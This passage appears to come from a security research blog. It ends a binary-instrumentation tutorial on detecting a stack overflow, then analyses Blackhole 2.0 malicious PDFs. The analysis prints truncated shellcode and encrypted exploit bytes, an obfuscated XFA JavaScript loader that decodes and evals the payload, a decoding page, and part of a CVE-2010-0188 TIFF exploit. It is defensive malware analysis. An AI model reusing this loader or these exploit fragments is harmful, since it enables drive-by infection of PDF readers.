                 fprintf(OutTrace, "%08x \n", LastExecutedBuf[i]);   
             }  
             fprintf(OutTrace, "%08x \n --- END ---", AddrEip);   
             fflush(OutTrace);  
             WINDOWS::ExitProcess(0);  
         }  
     }  
   
     LastExecutedBuf[LastExecutedPos] = AddrEip;  
     LastExecutedPos++;  
     if(LastExecutedPos >= LAST_EXECUTED)  
     {  
         // circular logging  
         LastExecutedPos = 0;  
     }  
 }  

You can simply copy it in the provided basic Pintool, but remember to also add the line:

CheckEipModule(AddrEip);

in the "DetectEip()" function (where specified by the comment).

Compile/link the Pintool and execute it.

Once executed, it will generate a log (I've cut some lines!) like the following:

Exception handler address: 7c91eaec 
Starting Pintool
Loading module C:\...\StackBof.exe 
Module Base: 41410000 
Module end: 41414fff 
Loading module C:\WINDOWS\system32\kernel32.dll 
Module Base: 7c800000 
Module end: 7c8fefff 
Loading module C:\WINDOWS\system32\ntdll.dll 
Module Base: 7c910000 
Module end: 7c9c5fff 
Loading module C:\WINDOWS\system32\MSVCR100.dll 
Module Base: 78aa0000 
Module end: 78b5dfff 
EIP detected not within an executable module: 0012ff84 
Dumping list of previously executed EIPs 
78ac005f 
78ac0061 
78ac0062 
78ac0063 
78ac0069 
...
78ab0cd7 
78ab0cd8 
78b05747 
4141104f 
41411052 
41411053 
41411054 
41411056 
41411057 
41411059 
4141105a 
41413020 
0012ff84 
 --- END ---

It's very simple to understand what happened just by reading the log:

  • the RET instruction is located at the address "0x4141105A";
  • it jumps to the overwritten return address, that is the address "0x41413020", where a "JMP ESP" is located;
  • Pintool successfully detects that we are trying to execute code within a non executable module (that is the "0x0012FF84" address, belonging to the stack).


Conclusions

This was an introductory article on binary instrumentation for exploit analysis purposes and I really hope you liked it! See you for the second part in a few days, where I will discuss another scenario: a real pdf exploit, that makes use of ROP and Heap Spraying.

Thursday, October 11, 2012

Some notes about the pdf exploits in Blackhole 2.0

Recently we have been hearing a lot about Blackhole 2.0, the last edition of the popular exploit kit, and so I started looking around to gather some more information. In particular, I searched for some websites hosting it and found out a pdf file that caught my attention (you can find it in <blackhole_host>/data/t.pdf). 

The curious thing about it is that it doesn't contain any malicious code and if we look closer we understand that it's only a sort of skeleton for the real malicious pdf.

In fact, just analyzing the raw bytes we see the following streams:

3 0 obj<<%data%/CreationDate(%title%)>>
endobj

42 0 obj<</Length 504/Filter[/FlateDecode]/Type/EmbeddedFile>>stream
%config%
endstream
endobj

43 0 obj<</Length 1313/Filter/FlateDecode/Type/EmbeddedFile>>stream
%js%
endstream
endobj


This suggests us that maybe the malicious pdf is built at runtime: it seems that the fields %data%, %title%, %config% and %js% are filled each time with data related to a different exploit, depending on the vulnerability found on the victim's system. Moreover, it is a novelty for the Blackhole exploit kit, as the other versions didn't make use of a similar approach.

So, I conducted further investigations, searched for some live exploit urls to perform a real infection and take a log with WireShark. I then extracted the pdf file from it and started analyzing it.

To do that I used an utility named PDFStreamDumper, that successfully decompresses the streams (note that some other alternatives, such as pdftk, failed in this attempt as maybe the file was intentionally corrupted in order to make the inspection more difficult).

The important streams are the same as the ones listed above, but in this case they are filled with some data (they are reported in a slightly different notation because I had to decompress them). Here they are, together with a brief explanation: 

3

<<
/Keywords(3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d3i3n3g21423a3r133b3b3b1f13… **ENCRYPTED EXPLOIT BYTES** …383j1l1b383l3l1l1c21433i403h1b473k20383l3l1m491c382f1j1b3k1c212f3m3a3g3e2c3i3e3l3d1k1h3r3a432s3a3l413e23383l3l1k49383j1m1b1c21)/CreationDate(6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5… **SHELLCODE BYTES** ...6363636d7477723d3033303333333034333430383335333830393035266c71786d746e66623d30332668657a6e647865663d746c796d6626717666707870656f3d75777462730000)
>>

This stream contains both the encrypted javascript exploit and the shellcode.


42

<config xmlns="http://www.xfa.org/schema/xci/1.0/" xmlns:xfa="http://www.xfa.org/schema/xci/1.0/"><trace><area level="1" name="font"></area></trace><agent name="designer"><!--  [0..n]  --><destination>pdf</destination><pdf><!--  [0..n]  --><fontInfo></fontInfo></pdf></agent><present><!--  [0..n]  --><pdf><!--  [0..n]  --><fontInfo><embed>1</embed></fontInfo><version>1.6</version><creator>Adobe Designer 7.0</creator><producer>Adobe Designer 7.0</producer><scriptModel>XFA</scriptModel><interactive>1</interactive><tagged>1</tagged><compression><level>6</level><compressLogicalStructure>1</compressLogicalStructure></compression></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present><acrobat><acrobat7><dynamicRender>forbidden</dynamicRender></acrobat7><common><locale></locale><data><incrementalLoad></incrementalLoad><adjustData></adjustData><xsl><uri></uri></xsl><outputXSL><uri></uri></outputXSL></data><template><base>C:\</base><relevant></relevant><uri></uri></template></common></acrobat></config>

This stream contains some xml data.


43

<!--&lt;template>--><template><subform layout="tb" locale="ru_RU" name="form1"><pageSet><pageArea id="Page1" name="Page1"><contentArea h="10.5in" w="8in" x="0.25in" y="0.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet><subform h="10.5in" w="8in"><field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.05mm"><ui><imageEdit></imageEdit></ui><caption placement="bottom" reserve="5mm"><font typeface="Myriad Pro"></font><para vAlign="middle"></para><value><text>Image Field</text></value></caption><border xmlns="http://www.xfa.org/schema/xfa-template/2.2/"><edge presence="hidden"></edge><edge stroke="dotted"></edge><edge stroke="dotted"></edge><edge stroke="dashed"></edge><corner stroke="dotted"></corner><corner stroke="dotted"></corner><corner stroke="dashed"></corner><fill><pattern type="crossDiagonal"></pattern></fill></border><event xmlns:xfa="http://www.xfa.org/schema/xfa-template/2.2/" activity="initialize">
<xfa:script contentType='application/x-javascript'>
with(event){
k=target[/**/"eval"];
if((app.addMenuItem+/**/"").indexOf(/**/'native')!=-1){a=/**/target.keywords;}
}
s="";
z=a;
/**/ss/**/=/**/String.fromCharCode/**/;
for(i=0;i&lt;a.length;i+=2){
s=s.concat(ss(parseInt(z[i]+z[1+i],0x1d)));
}
k(s);
</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template>

This stream contains the script that decrypts the exploit itself.


To decrypt the exploit, you can use the following html page ("z" contains the encrypted bytes):

<html>

<head>
<title>Decrypted Exploit</title>
</head>

<body>
<script language="javascript">

var z;
var s;
z = "3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d3i3n3g21423a3r133b3b3b1f13… **ENCRYPTED EXPLOIT BYTES** …383j1l1b383l3l1l1c21433i403h1b473k20383l3l1m491c382f1j1b3k1c212f3m3a3g3e2c3i3e3l3d1k1h3r3a432s3a3l413e23383l3l1k49383j1m1b1c21";
s = "";
for(i=0; i < z.length; i+=2)
{
  document.write(String.fromCharCode(parseInt(z[i]+z[1+i], 0x1d)));
  if(String.fromCharCode(parseInt(z[i]+z[1+i], 0x1d)) == ';' )
     document.write("<br/>");
}

</script>
</body>

</html>


Which leads to the following well known vulnerability (CVE-2010-0188):

*REMOVED*
  _j8='SUkqADggAABB'; // * base64 representation of a TIFF header! *
   _j9=_I2('QUFB',10984);
   _ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
   _ll1=_j8+_j9+_ll0+_j5;
   _ll2=_ji1(_j7,'');
   if(_ll2.length%2)_ll2+=unescape('');
   _ll3=_j2(_ll2);
   with(
   {
     k:_ll3
   }
   )_I0(k);
   ImageField1.rawValue=_ll1
*REMOVED*


I also gathered some other malicious pdf files and found out that they are structured always in the same way: the decryption script may change a little (for example, I found "0x1C" instead of "0x1D", that is the numerical base employed to interpret the bytes), but the method itself will be very similar.